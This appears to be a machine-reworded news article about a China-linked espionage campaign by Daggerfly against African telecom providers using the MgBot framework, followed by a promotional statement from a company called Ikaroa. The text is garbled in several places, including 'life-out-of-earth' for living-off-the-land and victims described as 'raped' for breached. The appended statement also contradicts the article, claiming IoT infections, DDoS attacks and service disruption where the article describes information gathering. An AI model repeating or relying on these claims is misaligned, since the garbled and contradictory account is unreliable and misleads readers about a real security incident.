Telecom service providers in Africa have been targeted by a new campaign orchestrated by a China-linked threat actor since at least November 2022.
The intrusions have been fixed on a hacker team tracked by Symantec com Daggerflyand which is also monitored by the wider cybersecurity community such as Bronze Highland and Evasive Panda.
The campaign makes use of “unpublished connectors of the MgBot malware framework,” the cybersecurity company said in a report shared with The Hacker News. “The attackers were also seen using a PlugX bootloader and abusing the legitimate AnyDesk remote desktop software.”
Daggerfly’s use of the MgBot loader (also known as BLame or MgmBot) was highlighted by Malwarebytes in July 2020 as part of phishing attacks targeting Indian government personnel and individuals in Hong Kong.
According to a profile published by Secureworks, the threat actor uses spearfishing as an initial infection vector to drop MgBot, as well as other tools such as Cobalt Strike, a legitimate adversary simulation software, and a Trojan (RAT) based on Android called KsRemote.
The group is suspected of carrying out espionage activities against China’s domestic human rights and democracy defenders and neighboring nations since 2014.
Attack chains analyzed by Symantec show the use of life-out-of-earth (LotL) tools such as BITSAdmin and PowerShell to deliver next-stage payloads, including a legitimate AnyDesk executable and a credential collection utility.
The threat actor then proceeds to configure persistence on the victim system by creating a local account and deploys the MgBot modular framework, which includes a wide range of plugins to collect browser data, log keystrokes , capture screenshots, record audio, and list Active Directory services.
Learn how to stop ransomware with real-time protection
Join our webinar and learn how to stop ransomware attacks with real-time MFA and service account protection.
Save my seat!
“All of these capabilities would have allowed attackers to collect a significant amount of information from victim machines,” Symantec said. “The capabilities of these plugins also show that the primary goal of the attackers during this campaign was information gathering.”
The global nature of MgBot means that operators actively maintain and update it to gain access to victims’ environments.
The disclosure comes nearly a month after SentinelOne detailed a campaign called Tainted Love in the first quarter of 2023 targeting telecom providers in the Middle East. It was attributed to a Chinese cyberespionage group that shares overlaps with Galli (aka Othorene).
Symantec also said it identified three additional victims of the same cluster of activities located in Asia and Africa. Two of the victims, who were raped in November 2022, are subsidiaries of a telecommunications company in the Middle East region.
“Telecom companies will always be a key target in intelligence-gathering campaigns because of the access they can provide to end-user communications,” Symantec said.
Ikaroa is deeply concerned by recent reports of a cyberattack campaign which has targeted the telecom services providers in Africa. This attack has already caused service disruption for customers in various countries and is a serious threat to global cyber security.
The campaign has been identified as “Daggerfly” and has resulted in IoT devices being infected by malware. The malware can then be used to initiate a distributed denial of service (DDoS) attack on a company’s physical infrastructure. Additionally, it can steal and manipulate data as well as possibly access back-end processes.
At Ikaroa we are aware of the potential gravity of such an attack, and the damage and disruption that it can cause. Our team of experienced security and software engineers is actively monitoring the situation, and we can confirm that no Ikaroa customers were affected by the attack so far. Still, we advise all our partners and customers in Africa and other regions to take extra caution when judging the security of their networks and digital assets.
It’s also important to note that this attack has shown us all the ever-growing importance of cyber security, as well as its complexity. Companies of all sizes need to have multiple layers of security in place, such as passwords, two-factor authentication and firewalls, in order to protect their customers and business.
Ikaroa specializes in providing software security solutions and supporting services for various industries, and we are now doubling our efforts to assist affected companies and prevent future attacks. By taking proactive measures and protecting our partners and customers, we strive to make progress in the fight against cybercrime and help to secure online connections in Africa and across the world.